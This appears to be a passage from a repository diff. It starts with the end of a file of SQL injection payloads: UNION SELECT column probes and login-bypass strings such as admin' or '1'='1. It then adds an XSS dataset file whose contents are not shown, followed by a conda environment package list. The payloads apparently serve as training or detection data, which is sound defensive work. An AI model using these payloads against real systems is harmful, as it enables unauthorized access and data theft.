UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

6613
datasets/xss.txt Normal file
View File

File diff suppressed because it is too large Load Diff

532
environment.yml Normal file
View File

@ -0,0 +1,532 @@
name: base
channels:
- defaults
dependencies:
- _anaconda_depends=2023.09=py311_mkl_1
- _libgcc_mutex=0.1=main
- _openmp_mutex=5.1=1_gnu
- abseil-cpp=20211102.0=hd4dd3e8_0
- aiobotocore=2.7.0=py311h06a4308_0
- aiohttp=3.9.0=py311h5eee18b_0
- aioitertools=0.7.1=pyhd3eb1b0_0
- aiosignal=1.2.0=pyhd3eb1b0_0
- alabaster=0.7.12=pyhd3eb1b0_0
- anaconda-anon-usage=0.4.2=py311hfc0e8ea_0
- anaconda-catalogs=0.2.0=py311h06a4308_0
- anaconda-client=1.12.1=py311h06a4308_0
- anaconda-cloud-auth=0.1.4=py311h06a4308_0
- anaconda-navigator=2.5.0=py311h06a4308_0
- anaconda-project=0.11.1=py311h06a4308_0
- anyio=3.5.0=py311h06a4308_0
- aom=3.6.0=h6a678d5_0
- appdirs=1.4.4=pyhd3eb1b0_0
- archspec=0.2.1=pyhd3eb1b0_0
- argon2-cffi=21.3.0=pyhd3eb1b0_0
- argon2-cffi-bindings=21.2.0=py311h5eee18b_0
- arrow=1.2.3=py311h06a4308_1
- arrow-cpp=11.0.0=h374c478_2
- astroid=2.14.2=py311h06a4308_0
- astropy=5.3.4=py311hf4808d0_0
- asttokens=2.0.5=pyhd3eb1b0_0
- async-lru=2.0.4=py311h06a4308_0
- atomicwrites=1.4.0=py_0
- attrs=23.1.0=py311h06a4308_0
- automat=20.2.0=py_0
- autopep8=1.6.0=pyhd3eb1b0_1
- aws-c-common=0.6.8=h5eee18b_1
- aws-c-event-stream=0.1.6=h6a678d5_6
- aws-checksums=0.1.11=h5eee18b_2
- aws-sdk-cpp=1.8.185=h721c034_1
- babel=2.11.0=py311h06a4308_0
- backports=1.1=pyhd3eb1b0_0
- backports.functools_lru_cache=1.6.4=pyhd3eb1b0_0
- backports.tempfile=1.0=pyhd3eb1b0_1
- backports.weakref=1.0.post1=py_1
- bcrypt=3.2.0=py311h5eee18b_1
- beautifulsoup4=4.12.2=py311h06a4308_0
- binaryornot=0.4.4=pyhd3eb1b0_1
- black=23.11.0=py311h06a4308_0
- blas=1.0=mkl
- bleach=4.1.0=pyhd3eb1b0_0
- blosc=1.21.3=h6a678d5_0
- bokeh=3.3.0=py311h92b7b1e_0
- boltons=23.0.0=py311h06a4308_0
- boost-cpp=1.82.0=hdb19cb5_2
- botocore=1.31.64=py311h06a4308_0
- bottleneck=1.3.5=py311hbed6279_0
- brotli=1.0.9=h5eee18b_7
- brotli-bin=1.0.9=h5eee18b_7
- brotli-python=1.0.9=py311h6a678d5_7
- brunsli=0.1=h2531618_0
- bzip2=1.0.8=h7b6447c_0
- c-ares=1.19.1=h5eee18b_0
- c-blosc2=2.10.5=h80c7b02_0
- ca-certificates=2023.12.12=h06a4308_0
- certifi=2023.11.17=py311h06a4308_0
- cffi=1.16.0=py311h5eee18b_0
- cfitsio=3.470=h5893167_7
- chardet=4.0.0=py311h06a4308_1003
- charls=2.2.0=h2531618_0
- charset-normalizer=2.0.4=pyhd3eb1b0_0
- click=8.1.7=py311h06a4308_0
- cloudpickle=2.2.1=py311h06a4308_0
- clyent=1.2.2=py311h06a4308_1
- colorama=0.4.6=py311h06a4308_0
- colorcet=3.0.1=py311h06a4308_0
- comm=0.1.2=py311h06a4308_0
- conda=23.11.0=py311h06a4308_0
- conda-build=3.28.3=py311h06a4308_0
- conda-content-trust=0.2.0=py311h06a4308_0
- conda-index=0.3.0=py311h06a4308_0
- conda-libmamba-solver=23.12.0=pyhd3eb1b0_1
- conda-pack=0.6.0=pyhd3eb1b0_0
- conda-package-handling=2.2.0=py311h06a4308_0
- conda-package-streaming=0.9.0=py311h06a4308_0
- conda-repo-cli=1.0.75=py311h06a4308_0
- conda-token=0.4.0=pyhd3eb1b0_0
- conda-verify=3.4.2=py_1
- constantly=23.10.4=py311h06a4308_0
- contourpy=1.2.0=py311hdb19cb5_0
- cookiecutter=2.5.0=py311h06a4308_0
- cryptography=41.0.7=py311hdda0065_0
- cssselect=1.1.0=pyhd3eb1b0_0
- curl=8.5.0=hdbd6064_0
- cycler=0.11.0=pyhd3eb1b0_0
- cyrus-sasl=2.1.28=h52b45da_1
- cytoolz=0.12.2=py311h5eee18b_0
- daal4py=2023.1.1=py311h4cb112f_0
- dal=2023.1.1=hdb19cb5_48680
- dask=2023.11.0=py311h06a4308_0
- dask-core=2023.11.0=py311h06a4308_0
- datasets=2.12.0=py311h06a4308_0
- datashader=0.16.0=py311h06a4308_0
- dav1d=1.2.1=h5eee18b_0
- dbus=1.13.18=hb2f20db_0
- debugpy=1.6.7=py311h6a678d5_0
- decorator=5.1.1=pyhd3eb1b0_0
- defusedxml=0.7.1=pyhd3eb1b0_0
- diff-match-patch=20200713=pyhd3eb1b0_0
- dill=0.3.6=py311h06a4308_0
- distributed=2023.11.0=py311h06a4308_0
- distro=1.8.0=py311h06a4308_0
- docstring-to-markdown=0.11=py311h06a4308_0
- docutils=0.18.1=py311h06a4308_3
- entrypoints=0.4=py311h06a4308_0
- et_xmlfile=1.1.0=py311h06a4308_0
- executing=0.8.3=pyhd3eb1b0_0
- expat=2.5.0=h6a678d5_0
- fastapi=0.103.0=py311h06a4308_0
- filelock=3.13.1=py311h06a4308_0
- flake8=6.0.0=py311h06a4308_0
- flask=2.2.5=py311h06a4308_0
- fmt=9.1.0=hdb19cb5_0
- font-ttf-dejavu-sans-mono=2.37=hd3eb1b0_0
- font-ttf-inconsolata=2.001=hcb22688_0
- font-ttf-source-code-pro=2.030=hd3eb1b0_0
- font-ttf-ubuntu=0.83=h8b1ccd4_0
- fontconfig=2.14.1=h4c34cd2_2
- fonts-anaconda=1=h8fa9717_0
- fonttools=4.25.0=pyhd3eb1b0_0
- freetype=2.12.1=h4a9f257_0
- frozenlist=1.4.0=py311h5eee18b_0
- fsspec=2023.10.0=py311h06a4308_0
- future=0.18.3=py311h06a4308_0
- gensim=4.3.0=py311hba01205_1
- gflags=2.2.2=he6710b0_0
- giflib=5.2.1=h5eee18b_3
- glib=2.69.1=he621ea3_2
- glog=0.5.0=h2531618_0
- gmp=6.2.1=h295c915_3
- gmpy2=2.1.2=py311hc9b5ff0_0
- greenlet=3.0.1=py311h6a678d5_0
- grpc-cpp=1.48.2=he1ff14a_1
- gst-plugins-base=1.14.1=h6a678d5_1
- gstreamer=1.14.1=h5eee18b_1
- h11=0.12.0=pyhd3eb1b0_0
- h2=4.0.0=py311h06a4308_3
- h5py=3.9.0=py311hdd6beaf_0
- hdf5=1.12.1=h2b7332f_3
- heapdict=1.0.1=pyhd3eb1b0_0
- holoviews=1.18.1=py311h06a4308_0
- hpack=4.0.0=py_0
- httpcore=0.15.0=py311h06a4308_0
- httpx=0.23.0=py311h06a4308_0
- huggingface_hub=0.17.3=py311h06a4308_0
- hvplot=0.9.1=py311h06a4308_0
- hyperframe=6.0.1=pyhd3eb1b0_0
- hyperlink=21.0.0=pyhd3eb1b0_0
- icu=73.1=h6a678d5_0
- idna=3.4=py311h06a4308_0
- imagecodecs=2023.1.23=py311h8105a5c_0
- imageio=2.31.4=py311h06a4308_0
- imagesize=1.4.1=py311h06a4308_0
- imbalanced-learn=0.11.0=py311h06a4308_1
- importlib-metadata=7.0.1=py311h06a4308_0
- importlib_metadata=7.0.1=hd3eb1b0_0
- incremental=21.3.0=pyhd3eb1b0_0
- inflection=0.5.1=py311h06a4308_0
- iniconfig=1.1.1=pyhd3eb1b0_0
- intake=0.6.8=py311h06a4308_0
- intel-openmp=2023.1.0=hdb19cb5_46306
- intervaltree=3.1.0=pyhd3eb1b0_0
- ipykernel=6.25.0=py311h92b7b1e_0
- ipython=8.20.0=py311h06a4308_0
- ipython_genutils=0.2.0=pyhd3eb1b0_1
- ipywidgets=8.0.4=py311h06a4308_0
- isort=5.9.3=pyhd3eb1b0_0
- itemadapter=0.3.0=pyhd3eb1b0_0
- itemloaders=1.0.4=pyhd3eb1b0_1
- itsdangerous=2.0.1=pyhd3eb1b0_0
- jaraco.classes=3.2.1=pyhd3eb1b0_0
- jedi=0.18.1=py311h06a4308_1
- jeepney=0.7.1=pyhd3eb1b0_0
- jellyfish=1.0.1=py311hb02cf49_0
- jinja2=3.1.2=py311h06a4308_0
- jmespath=1.0.1=py311h06a4308_0
- joblib=1.2.0=py311h06a4308_0
- jpeg=9e=h5eee18b_1
- jq=1.6=h27cfd23_1000
- json5=0.9.6=pyhd3eb1b0_0
- jsonpatch=1.32=pyhd3eb1b0_0
- jsonpointer=2.1=pyhd3eb1b0_0
- jsonschema=4.19.2=py311h06a4308_0
- jsonschema-specifications=2023.7.1=py311h06a4308_0
- jupyter=1.0.0=py311h06a4308_8
- jupyter-lsp=2.2.0=py311h06a4308_0
- jupyter_client=8.6.0=py311h06a4308_0
- jupyter_console=6.6.3=py311h06a4308_0
- jupyter_core=5.5.0=py311h06a4308_0
- jupyter_events=0.8.0=py311h06a4308_0
- jupyter_server=2.10.0=py311h06a4308_0
- jupyter_server_terminals=0.4.4=py311h06a4308_1
- jupyterlab=4.0.8=py311h06a4308_0
- jupyterlab_pygments=0.1.2=py_0
- jupyterlab_server=2.25.1=py311h06a4308_0
- jupyterlab_widgets=3.0.9=py311h06a4308_0
- jxrlib=1.1=h7b6447c_2
- kaleido-core=0.2.1=h7c8854e_0
- keyring=23.13.1=py311h06a4308_0
- kiwisolver=1.4.4=py311h6a678d5_0
- krb5=1.20.1=h143b758_1
- lazy-object-proxy=1.6.0=py311h5eee18b_0
- lazy_loader=0.3=py311h06a4308_0
- lcms2=2.12=h3be6417_0
- ld_impl_linux-64=2.38=h1181459_1
- lerc=3.0=h295c915_0
- libaec=1.0.4=he6710b0_1
- libarchive=3.6.2=h6ac8c49_2
- libavif=0.11.1=h5eee18b_0
- libboost=1.82.0=h109eef0_2
- libbrotlicommon=1.0.9=h5eee18b_7
- libbrotlidec=1.0.9=h5eee18b_7
- libbrotlienc=1.0.9=h5eee18b_7
- libclang=14.0.6=default_hc6dbbc7_1
- libclang13=14.0.6=default_he11475f_1
- libcups=2.4.2=h2d74bed_1
- libcurl=8.5.0=h251f7ec_0
- libdeflate=1.17=h5eee18b_1
- libedit=3.1.20230828=h5eee18b_0
- libev=4.33=h7f8727e_1
- libevent=2.1.12=hdbd6064_1
- libffi=3.4.4=h6a678d5_0
- libgcc-ng=11.2.0=h1234567_1
- libgfortran-ng=11.2.0=h00389a5_1
- libgfortran5=11.2.0=h1234567_1
- libgomp=11.2.0=h1234567_1
- liblief=0.12.3=h6a678d5_0
- libllvm14=14.0.6=hdb19cb5_3
- libmamba=1.5.6=haf1ee3a_0
- libmambapy=1.5.6=py311h2dafd23_0
- libnghttp2=1.57.0=h2d74bed_0
- libpng=1.6.39=h5eee18b_0
- libpq=12.15=hdbd6064_1
- libprotobuf=3.20.3=he621ea3_0
- libsodium=1.0.18=h7b6447c_0
- libsolv=0.7.24=he621ea3_0
- libspatialindex=1.9.3=h2531618_0
- libssh2=1.10.0=hdbd6064_2
- libstdcxx-ng=11.2.0=h1234567_1
- libthrift=0.15.0=h1795dd8_2
- libtiff=4.5.1=h6a678d5_0
- libuuid=1.41.5=h5eee18b_0
- libwebp=1.3.2=h11a3e52_0
- libwebp-base=1.3.2=h5eee18b_0
- libxcb=1.15=h7f8727e_0
- libxkbcommon=1.0.1=h5eee18b_1
- libxml2=2.10.4=hf1b16e4_1
- libxslt=1.1.37=h5eee18b_1
- libzopfli=1.0.3=he6710b0_0
- linkify-it-py=2.0.0=py311h06a4308_0
- llvmlite=0.41.0=py311he621ea3_0
- locket=1.0.0=py311h06a4308_0
- lxml=4.9.3=py311hdbbb534_0
- lz4=4.3.2=py311h5eee18b_0
- lz4-c=1.9.4=h6a678d5_0
- lzo=2.10=h7b6447c_2
- markdown=3.4.1=py311h06a4308_0
- markdown-it-py=2.2.0=py311h06a4308_1
- markupsafe=2.1.3=py311h5eee18b_0
- mathjax=2.7.5=h06a4308_0
- matplotlib=3.8.0=py311h06a4308_0
- matplotlib-base=3.8.0=py311ha02d727_0
- matplotlib-inline=0.1.6=py311h06a4308_0
- mccabe=0.7.0=pyhd3eb1b0_0
- mdit-py-plugins=0.3.0=py311h06a4308_0
- mdurl=0.1.0=py311h06a4308_0
- menuinst=2.0.1=py311h06a4308_1
- mistune=2.0.4=py311h06a4308_0
- mkl=2023.1.0=h213fc3f_46344
- mkl-service=2.4.0=py311h5eee18b_1
- mkl_fft=1.3.8=py311h5eee18b_0
- mkl_random=1.2.4=py311hdb19cb5_0
- more-itertools=10.1.0=py311h06a4308_0
- mpc=1.1.0=h10f8cd9_1
- mpfr=4.0.2=hb69a4c5_1
- mpi=1.0=mpich
- mpich=4.1.1=hbae89fd_0
- mpmath=1.3.0=py311h06a4308_0
- msgpack-python=1.0.3=py311hdb19cb5_0
- multidict=6.0.4=py311h5eee18b_0
- multipledispatch=0.6.0=py311h06a4308_0
- multiprocess=0.70.14=py311h06a4308_0
- munkres=1.1.4=py_0
- mypy_extensions=1.0.0=py311h06a4308_0
- mysql=5.7.24=h721c034_2
- navigator-updater=0.4.0=py311h06a4308_1
- nbclient=0.8.0=py311h06a4308_0
- nbconvert=7.10.0=py311h06a4308_0
- nbformat=5.9.2=py311h06a4308_0
- ncurses=6.4=h6a678d5_0
- nest-asyncio=1.5.6=py311h06a4308_0
- networkx=3.1=py311h06a4308_0
- nltk=3.8.1=py311h06a4308_0
- notebook=7.0.6=py311h06a4308_0
- notebook-shim=0.2.3=py311h06a4308_0
- nspr=4.35=h6a678d5_0
- nss=3.89.1=h6a678d5_0
- numba=0.58.1=py311ha02d727_0
- numexpr=2.8.7=py311h65dcdc2_0
- numpy=1.26.3=py311h08b1b3b_0
- numpy-base=1.26.3=py311hf175353_0
- numpydoc=1.5.0=py311h06a4308_0
- oniguruma=6.9.7.1=h27cfd23_0
- openjpeg=2.4.0=h3ad879b_0
- openpyxl=3.0.10=py311h5eee18b_0
- openssl=3.0.12=h7f8727e_0
- orc=1.7.4=hb3bc3d3_1
- overrides=7.4.0=py311h06a4308_0
- packaging=23.1=py311h06a4308_0
- pandas=2.1.4=py311ha02d727_0
- pandocfilters=1.5.0=pyhd3eb1b0_0
- panel=1.3.1=py311h06a4308_0
- param=2.0.1=py311h06a4308_0
- parsel=1.6.0=py311h06a4308_0
- parso=0.8.3=pyhd3eb1b0_0
- partd=1.4.1=py311h06a4308_0
- patch=2.7.6=h7b6447c_1001
- patchelf=0.17.2=h6a678d5_0
- pathlib=1.0.1=pyhd3eb1b0_1
- pathspec=0.10.3=py311h06a4308_0
- patsy=0.5.3=py311h06a4308_0
- pcre=8.45=h295c915_0
- pcre2=10.42=hebb0a14_0
- pep8=1.7.1=py311h06a4308_1
- pexpect=4.8.0=pyhd3eb1b0_3
- pickleshare=0.7.5=pyhd3eb1b0_1003
- pillow=10.0.1=py311ha6cbd5a_0
- pip=23.2.1=py311h06a4308_0
- pkce=1.0.3=py311h06a4308_0
- pkginfo=1.9.6=py311h06a4308_0
- platformdirs=3.10.0=py311h06a4308_0
- plotly=5.9.0=py311h06a4308_0
- pluggy=1.0.0=py311h06a4308_1
- ply=3.11=py311h06a4308_0
- prometheus_client=0.14.1=py311h06a4308_0
- prompt-toolkit=3.0.43=py311h06a4308_0
- prompt_toolkit=3.0.43=hd3eb1b0_0
- protego=0.1.16=py_0
- psutil=5.9.0=py311h5eee18b_0
- ptyprocess=0.7.0=pyhd3eb1b0_2
- pure_eval=0.2.2=pyhd3eb1b0_0
- py-cpuinfo=9.0.0=py311h06a4308_0
- py-lief=0.12.3=py311h6a678d5_0
- pyarrow=11.0.0=py311hd8e8d9b_1
- pyasn1=0.4.8=pyhd3eb1b0_0
- pyasn1-modules=0.2.8=py_0
- pybind11-abi=4=hd3eb1b0_1
- pycodestyle=2.10.0=py311h06a4308_0
- pycosat=0.6.6=py311h5eee18b_0
- pycparser=2.21=pyhd3eb1b0_0
- pyct=0.5.0=py311h06a4308_0
- pycurl=7.45.2=py311hdbd6064_1
- pydantic=1.10.12=py311h5eee18b_1
- pydispatcher=2.0.5=py311h06a4308_2
- pydocstyle=6.3.0=py311h06a4308_0
- pyerfa=2.0.0=py311h5eee18b_0
- pyflakes=3.0.1=py311h06a4308_0
- pygments=2.15.1=py311h06a4308_1
- pyjwt=2.4.0=py311h06a4308_0
- pylint=2.16.2=py311h06a4308_0
- pylint-venv=2.3.0=py311h06a4308_0
- pyls-spyder=0.4.0=pyhd3eb1b0_0
- pyodbc=4.0.39=py311h6a678d5_0
- pyopenssl=23.2.0=py311h06a4308_0
- pyparsing=3.0.9=py311h06a4308_0
- pyqt=5.15.10=py311h6a678d5_0
- pyqt5-sip=12.13.0=py311h5eee18b_0
- pyqtwebengine=5.15.10=py311h6a678d5_0
- pysocks=1.7.1=py311h06a4308_0
- pytables=3.8.0=py311hb8ae3fc_3
- pytest=7.4.0=py311h06a4308_0
- python=3.11.5=h955ad1f_0
- python-dateutil=2.8.2=pyhd3eb1b0_0
- python-dotenv=0.21.0=py311h06a4308_0
- python-fastjsonschema=2.16.2=py311h06a4308_0
- python-json-logger=2.0.7=py311h06a4308_0
- python-kaleido=0.2.1=py311h06a4308_0
- python-libarchive-c=2.9=pyhd3eb1b0_1
- python-lmdb=1.4.1=py311h6a678d5_0
- python-lsp-black=1.2.1=py311h06a4308_0
- python-lsp-jsonrpc=1.0.0=pyhd3eb1b0_0
- python-lsp-server=1.7.2=py311h06a4308_0
- python-slugify=5.0.2=pyhd3eb1b0_0
- python-snappy=0.6.1=py311h6a678d5_0
- python-tzdata=2023.3=pyhd3eb1b0_0
- python-xxhash=2.0.2=py311h5eee18b_1
- pytoolconfig=1.2.6=py311h06a4308_0
- pytz=2023.3.post1=py311h06a4308_0
- pyviz_comms=3.0.0=py311h06a4308_0
- pywavelets=1.5.0=py311hf4808d0_0
- pyxdg=0.27=pyhd3eb1b0_0
- pyyaml=6.0.1=py311h5eee18b_0
- pyzmq=25.1.0=py311h6a678d5_0
- qdarkstyle=3.0.2=pyhd3eb1b0_0
- qstylizer=0.2.2=py311h06a4308_0
- qt-main=5.15.2=h53bd1ea_10
- qt-webengine=5.15.9=h9ab4d14_7
- qtawesome=1.2.2=py311h06a4308_0
- qtconsole=5.4.2=py311h06a4308_0
- qtpy=2.4.1=py311h06a4308_0
- queuelib=1.6.2=py311h06a4308_0
- re2=2022.04.01=h295c915_0
- readline=8.2=h5eee18b_0
- referencing=0.30.2=py311h06a4308_0
- regex=2023.10.3=py311h5eee18b_0
- reproc=14.2.4=h295c915_1
- reproc-cpp=14.2.4=h295c915_1
- requests=2.31.0=py311h06a4308_0
- requests-file=1.5.1=pyhd3eb1b0_0
- requests-toolbelt=1.0.0=py311h06a4308_0
- responses=0.13.3=pyhd3eb1b0_0
- rfc3339-validator=0.1.4=py311h06a4308_0
- rfc3986=1.4.0=pyhd3eb1b0_0
- rfc3986-validator=0.1.1=py311h06a4308_0
- rich=13.3.5=py311h06a4308_0
- rope=1.7.0=py311h06a4308_0
- rpds-py=0.10.6=py311hb02cf49_0
- rtree=1.0.1=py311h06a4308_0
- ruamel.yaml=0.17.21=py311h5eee18b_0
- ruamel_yaml=0.17.21=py311h5eee18b_0
- s3fs=2023.10.0=py311h06a4308_0
- safetensors=0.4.0=py311h24d97f6_0
- scikit-image=0.20.0=py311h6a678d5_0
- scikit-learn=1.2.2=py311h6a678d5_1
- scikit-learn-intelex=2023.1.1=py311h06a4308_0
- scipy=1.11.4=py311h08b1b3b_0
